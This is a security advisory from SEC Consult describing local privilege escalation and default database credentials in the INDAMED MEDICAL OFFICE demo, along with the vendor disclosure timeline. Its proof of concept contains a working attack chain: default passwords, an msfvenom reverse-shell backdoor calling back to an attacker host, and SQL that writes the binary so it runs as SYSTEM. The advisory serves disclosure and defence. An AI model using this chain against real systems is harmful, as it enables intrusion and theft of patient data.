Local Privilege Escalation and Default Credentials in MEDICAL OFFICE demo by INDAMED

Title

Local Privilege Escalation and Default Credentials

Product

INDAMED MEDICAL OFFICE Demo

Vulnerable Version

Revision 18544 (II/2024)

Fixed Version

Q2/2025 (Privilege Escalation, Default Password), Q3/2025 (medoff DBA Privileges)

CVE Number

-

Impact

critical

Homepage

https://www.indamed.de

Found

08.05.2024

By

Daniel Hirschberger, Tobias Niemann, Florian Stuhlmann (Office Bochum) | SEC Consult Vulnerability Lab

Management Summary

The demo version of the medical software "Medical Office" was vulnerable against local privilege escalation and used default credentials to connect to the patient data database. By using both vulnerabilities, an attacker was able to achieve remote code execution (RCE) with the privileges of a local administrator via the network. The production environment of the software was not affected from the identified security issues according to the vendor.

Vendor description

"MEDICAL OFFICE is a versatile doctor's software that provides you with excellent support in practice management. Various modules give you the opportunity to expand MEDICAL OFFICE Professional individually. The practice software is therefore very well suited for use in a wide variety of medical practices, supra-local group practices, medical care centers (MVZ), therapeutic practices and hospital outpatient departments."

Source: https://www.indamed.de/

Business recommendation

The vendor clarified that only our tested demo version from their website is affected by the identified security issues. The production environment is hardened by their certified technicians and medical facilities are configured in accordance with the security guidelines of the "Kassenärztliche Bundesvereinigung (KBV)".

The vendor provides a further hardened software update as well.

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential
further security issues.

Vulnerability overview/description

1) Local Privilege Escalation (Demo version)

The installation of MEDICAL OFFICE defaults to the folder "C:\INDAMED" and installs services which are running with "NT AUTHORITY\SYSTEM" permissions. Attackers can replace existing services with their own malicious services to escalate privileges to "SYSTEM".

2) Hardcoded Credentials (Demo version)

The application uses a Firebird database for statistical medical data and a MariaDB for the core data, e.g. users, patients, patient data, etc. For both databases default or easily guessable credentials are used. An attacker can use this to exfiltrate data, falsify records or in combination with the previous vulnerability, execute arbitrary code as the "SYSTEM" user by exploiting it remotely via the network.

Proof of concept

Figure 1: Privilege Escalation

1) Local Privilege Escalation (Demo version)

By default, MEDICAL OFFICE is installed in the folder "C:\INDAMED" and contains several service binaries which are run as "SYSTEM". By renaming one of the following services and writing a malicious service binary with the original Name of the service, an attacker can escalate privileges to "SYSTEM":

guardian.exe
moserver.exe

Example: While the moserver.exe is running an attacker can rename the file to moserverx.exe and drop a malicious service binary with the name moserver.exe. Afterwards one has to restart the moserver.exe service which is not possible for normal users. The attacker can however reboot the machine to complete the attack.

An easier variant uses the fact that dropping a service binary with the name "guardian.new" will force the currently running guardian to stop, copy the "guardian.new" to "guardian.exe" and then start the service.

By utilizing PowerUp's 'Write-ServiceBinary' (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1), the attack can be simplified to the following oneliner:

Write-ServiceBinary -UserName secconsult -Name "MEDICAL OFFICE - Guardian" -Path C:\INDAMED\guardian.new
Figure 2: Firewall default settings

2) Hardcoded Credentials (Demo version)

MEDICAL OFFICE uses a Firebird database for statistical medical data which is located at "C:\INDAMED\dat\MOSTAT242G.gdb". The Firebird server uses the Default credentials "SYSDBA:masterkey". Fortunately, the Firebird server is not exposed by default.

The core database which contains user, patients and medical data is a MariaDB instance which is listening on port 2020 and uses the default credentials "medoff:medoff". The installer creates a firewall rule to allow connections to this port.

Figure 3: Database grants

The hardcoded credentials can be used to login in to the MariaDB with the user medoff who has DBA rights:

Figure 4: Reverse shell

By using TEMPORARY TABLES, LOAD DATA LOCAL and SELECT INTO OUTFILE, an attacker can write a malicious service binary to "C:\INDAMED\guardian.new". This seems to be used during an update to restart the guardian service. As soon as a "guardian.new" is detected the currently running guardian service stops all processes, copies "guardian.new" to "guardian.exe" and starts the new Guardian executable with SYSTEM permissions.

The attack can be performed in two parts:

a) Create a backdoored guardian.exe

A backdoored service executable can i.e. be created with msfvenom:

msfvenom -p windows/shell_reverse_tcp -o guardian.new LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -k -f exe -x guardian.exe

b) Upload and save the backdoored guardian.exe to "C:\INDAMED\guardian.new":

USE medoff;
CREATE TEMPORARY TABLE mytest (payload LONGBLOB);
LOAD DATA LOCAL INFILE "backdoor.exe" INTO TABLE mytest FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED by 'doesnotexist';
SELECT * FROM mytest INTO OUTFILE "C:\INDAMED\guardian.new" FIELDS TERMINATED BY 'doesnotexist' LINES TERMINATED BY 'doesnotexist';

Afterwards, MEDICAL OFFICE seems to work as usual and spawns a reverse shell on the attacker's machine:

Vulnerable / tested versions

The following version has been tested which was the latest version available at the time of the test:

  • Revision 18544 (II/2024) - Demo version from the vendor's website

Vendor contact timeline

2024-10-07 Contacting vendor through info@indamed.de
2024-10-08 Vendor responds professionally and asks for details. Sending security advisory to vendor.
2024-10-24 Asking for a status update.
2024-10-28 Vendor CEO states that they are working on a Statement and on fixing the issues. They also ask for our Client who authorized the assessment. We respond that this was done on our behalf as part of a research project.
2024-11-12 Asking for a status update.
2024-11-13 Vendor asks for a delay of the disclosure.
2024-11-14 We agree to delay the disclosure.
2025-01-13 Asking for a status update.
2025-01-21 Vendor responds, that local network access is necessary and all medical facilities are required to adhere to the security guides of the "Kassenärztliche Bundesvereinigung (KBV)". Regarding issue 1), only certified technicians are Performing the installation and the guidelines have been verified and updated. Future updates will optimize the installation further and remove extended permissions. Regarding issue 2), this only affects the demo version, only secure passwords are used for production environments. Future improvements include validation and adaptation/removal of access rights of the "medoff" user. Those will be rolled out in March 2025.
2025-01-22 Thanking the vendor for the detailed response. Asking when most customers will have the new hardened SW version to coordinate our release.
2025-03-04 We ask for a date when the patch is done.
2025-03-12 Update Q2/25 will fix the upgrade process and ensure that that new installations get a complex database password. Q3/25 will then further harden the database user.
2025-03-18 We ask for coordination regarding the publication date and offer to write a small success story.
2025-04-16 We ask for a suitable publication date.
2025-05-20 Vendor CEO tells us that we can proceed with publishing the advisory and that he is interested in highlighting our work in a small success story. Additionally, he thanks us for our patience and professionalism.
2025-06-04 Coordinated release of advisory.

Solution

The vendor clarified that only our tested demo version from their website is affected by the identified security issues. The production environment is hardened by their certified technicians and medical facilities are configured in accordance with the security guidelines of the "Kassenärztliche Bundesvereinigung (KBV)". Additionally, the vendor implemented a revised upgrade process as well as a hardened database password.

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

 

EOF Daniel Hirschberger, Tobias Niemann, Florian Stuhlmann / @2025

 

Interested to work with the experts of SEC Consult? Send us your application.
Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices

Back